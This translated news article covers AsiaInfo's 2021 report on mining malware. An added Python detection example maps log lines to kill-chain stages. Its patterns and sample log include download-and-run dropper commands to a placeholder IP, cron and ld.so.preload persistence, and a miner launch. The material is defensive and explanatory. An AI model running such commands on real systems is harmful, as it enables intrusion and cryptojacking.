AsiaInfo releases a special report on mining viruses in 2021, focusing on the evolution and governance of mining viruses

Contributed | Trend Micro

Produced | CSDN Cloud Computing

Recently, the "AsiaInfo Security 2021 Mining Virus Special Report" (hereinafter the "Report") was officially released. The Report draws on the mining virus incidents monitored, analyzed and handled by the AsiaInfo Security Threat Intelligence and Service Operation Department in 2021, analyzes and summarizes the various mining viruses and attacks, and explores in depth how they may evolve in the future. To help more users plan their security with safer, more efficient and more comprehensive measures, it provides a reference path for mining virus governance.

A comprehensive review of mining virus incidents in 2021

In 2021, AsiaInfo blocked a total of 516,443 mining viruses. On this basis, the Report reviews the typical mining viruses and incidents of the year as a whole and summarizes the characteristics and aims of their attacks. It finds that some mining viruses attack enterprise cloud servers in order to maximize profit; some cooperate with botnets to seize market share quickly; and some have made technical breakthroughs of their own, using a variety of vulnerability exploitation methods. Beyond that, mining viruses are also taking innovative routes, such as falsifying CPU usage and using Linux kernel rootkits for stealthy mining.

Figure 1 Review of mining virus attacks in 2021

Rising virtual currency prices push mining to highs

In 2021, COVID-19 raged around the world, and the economy shifted from real to virtual at an unprecedented pace. Virtual currencies, wearing a "safe haven" halo, saw several substantial rises over the past year: the well-known Bitcoin (BTC) rose more than 90%, while Ethereum (ETH) surged more than 540%. With virtual currency prices skyrocketing, profit-driven hackers also targeted the virtual currency market, using mining scripts to monetize traffic, which made mining viruses one of the attack methods most frequently used by criminals.

Figure 2 Bitcoin trend chart since the beginning of 2019

The proliferation of mining viruses undermines the "dual carbon" goals, and comprehensive rectification has achieved initial results

Mining viruses not only cause economic losses to users but also consume huge amounts of energy. According to industry research, in 2021 the annual power consumption of Bitcoin mining in China was about 79.1 TWh, accounting for 0.95% of the country's total power consumption and producing about 34.8 million metric tons of carbon emissions. Without policy intervention, it is estimated that in 2024 the annual energy consumption of Bitcoin mining in China will peak at 296.59 TWh, generating 130.5 million metric tons of carbon emissions, about 5.41% of China's carbon emissions from power generation.

To promote energy conservation and emission reduction and achieve the carbon peaking and carbon neutrality goals in 2060, in September 2021 ten departments including the National Development and Reform Commission jointly issued a notice requiring a comprehensive rectification of virtual currency "mining" activities. AsiaInfo's data tracking from 2016 to 2021 shows a downward trend in the number of domestic mining viruses in 2021, confirming that China's comprehensive rectification of virtual currency "mining" in 2021 has achieved initial results.

Comprehensive analysis of the mining attack kill chain: XDR can establish effective interception points

To help state agencies clean up and rectify virtual currency "mining" activities, AsiaInfo started from this year's mining incidents, analyzed a large number of mining virus samples, summarized the mining virus kill chain and new technical trends, and offered security advice on mining viruses.

Figure 3 Mining virus kill chain and the 14 key monitoring points established by AsiaInfo

The kill chain of a mining virus attack comprises seven steps: reconnaissance and tracking, weapon construction, lateral penetration, payload delivery, installation and implantation, remote control, and mining execution. The attacker first searches for weaknesses in the target, then uses vulnerabilities and backdoors to craft a deliverable weapon carrier, delivers the weapon package to the target machine, runs the exploit code on the victim's system and installs malware at the target location, establishes a path for remotely controlling the target system, and finally releases the mining program and executes mining, at which point the attacker can remotely complete the intended goal.

Against the kill chain described above, AsiaInfo Security has set up 14 key monitoring points and, through its Deep Threat Discovery Appliance (TDA), cloud host security (DeepSecurity), endpoint virus protection (OfficeScan), endpoint detection and response (EDR), network detection and response (TDA+Spiderflow), anti-virus gateway (AISEdge), investigation and analysis threat hunting services and other products, discovers, detects, responds to, eliminates, recovers from and prevents mining viruses across multiple dimensions.
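The report describes the kill chain and the idea of placing monitoring points along it; the following added example (written for this page, not code from AsiaInfo or the Report) shows the defensive side of that idea in Python: a small rule set maps host and network log events onto the seven stages named above and reports the earliest stage that was observed, which is where an interception point would have stopped the intrusion. The indicator patterns, the host name and the log lines are constructed for illustration and are not AsiaInfo's 14 monitoring points.

```python
"""Kill-chain staging of host and network events for mining-virus detection.

Added example, not part of the AsiaInfo report.  The rules are generic
indicators (scan, SSH brute force, download-and-run dropper, persistence,
C2 beacon, stratum pool / miner binary), constructed for this example.
"""
import re

# The seven stages named in the report, in kill-chain order.
STAGES = [
    "reconnaissance",
    "weaponization",
    "lateral movement",
    "payload delivery",
    "installation",
    "remote control",
    "mining execution",
]

# (stage, pattern, reason).  Weaponization happens on the attacker's side and
# leaves no trace in victim logs, so no rule targets it.
RULES = [
    ("reconnaissance",
     re.compile(r"\bport scan\b|\bmasscan\b|\bnmap\b", re.I),
     "scanning from an external host"),
    ("lateral movement",
     re.compile(r"Failed password for .* from [0-9.]+"),
     "credential brute force over SSH"),
    ("payload delivery",
     re.compile(r"\b(curl|wget)\b.*https?://\S+\.sh\b.*\|\s*(ba)?sh"),
     "download-and-execute of a shell dropper"),
    ("installation",
     re.compile(r"crontab -|/etc/cron\.|/etc/ld\.so\.preload|\binsmod\b"),
     "persistence via cron, LD_PRELOAD or a kernel module"),
    ("remote control",
     re.compile(r"outbound .*:(4444|1337)\b", re.I),
     "beacon to a port commonly used for C2 in this example"),
    ("mining execution",
     re.compile(r"stratum\+tcp://|\bxmrig\b|\bminerd\b|--donate-level"),
     "stratum pool connection or known miner binary"),
]


def classify(lines):
    """Return [(stage, reason, line)] for every line that matches a rule.

    Rules are tried in kill-chain order and the first match wins, so a line
    is attributed to the earliest stage it could belong to.
    """
    hits = []
    for line in lines:
        for stage, pattern, reason in RULES:
            if pattern.search(line):
                hits.append((stage, reason, line))
                break
    return hits


def stages_observed(hits):
    """Distinct stages seen, sorted in kill-chain order."""
    return sorted({stage for stage, _, _ in hits}, key=STAGES.index)


def earliest_stage(hits):
    """Earliest stage observed: the first point an interception could have fired."""
    seen = stages_observed(hits)
    return seen[0] if seen else None


# Constructed log excerpt from a hypothetical host "web01".  198.51.100.7 is a
# documentation address (RFC 5737), not a real attacker.
SAMPLE_LOG = [
    'Mar 03 10:01:12 web01 kernel: [fw] port scan detected from 198.51.100.7',
    'Mar 03 10:02:40 web01 sshd[2210]: Failed password for root from 198.51.100.7 port 50122 ssh2',
    'Mar 03 10:05:03 web01 audit: uid=33 cmd="curl -fsSL http://198.51.100.7/d.sh | sh"',
    'Mar 03 10:05:05 web01 audit: uid=33 cmd="(crontab -l; echo * * * * * /tmp/.x/run.sh) | crontab -"',
    'Mar 03 10:05:07 web01 audit: uid=33 cmd="echo /tmp/.x/lib.so > /etc/ld.so.preload"',
    'Mar 03 10:05:09 web01 netmon: outbound tcp 10.0.0.12:41022 -> 198.51.100.7:4444',
    'Mar 03 10:05:30 web01 audit: uid=33 cmd="/tmp/.x/kthreaddi -o stratum+tcp://pool.example:3333 --donate-level 0"',
    'Mar 03 10:06:00 web01 sshd[2301]: Accepted publickey for deploy from 10.0.0.5 port 40012 ssh2',
]

if __name__ == "__main__":
    hits = classify(SAMPLE_LOG)
    for stage, reason, line in hits:
        print(f"[{stage:>17}] {reason}: {line}")
    print("stages observed:", stages_observed(hits))
    print("earliest interception point:", earliest_stage(hits))
```

On the constructed excerpt, six of the seven stages are visible (weaponization never shows up on the victim), and the earliest observed stage is reconnaissance, so a monitoring point on scan detection would have fired before any payload landed. In a real deployment the rules would be replaced by the telemetry of the products listed above; the value of the staging is that it tells the responder how far the intrusion had progressed and which earlier control failed to intercept it.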

The Report also contains detailed analysis and recommendations on the following:

  • Exploit weapons and brute-force tools are the intrusion weapons of choice for mining gangs, and they are adopting new exploits ever faster, which places higher demands on defense and security response capabilities.
  • Thanks to its strong anonymity, Monero is favored by mining gangs and has become the preferred currency of mining viruses. Advanced evasion techniques such as fileless execution and steganography are widespread, and the security confrontation continues to escalate.
  • In recent years, domestic cloud infrastructure has developed rapidly, and governments and enterprises are actively moving to the cloud. Enterprise clouds and data centers, with large amounts of industrial-grade hardware, will become key targets of mining viruses.
  • Mining viruses continue to pursue profit-maximizing "mining". By introducing botnet modules and cooperating with botnets, they rely on the botnets' huge infection base to expand rapidly and occupy the market, while raising their own profile at the same time.
  • Mining viruses have evolved considerably, and effective protection is hard to achieve with a single security product. Targeted, layered detection and protection matched to the characteristics of the virus are required.


Origin http://43.154.161.224:23101/article/api/json?id=324124056&siteId=291194637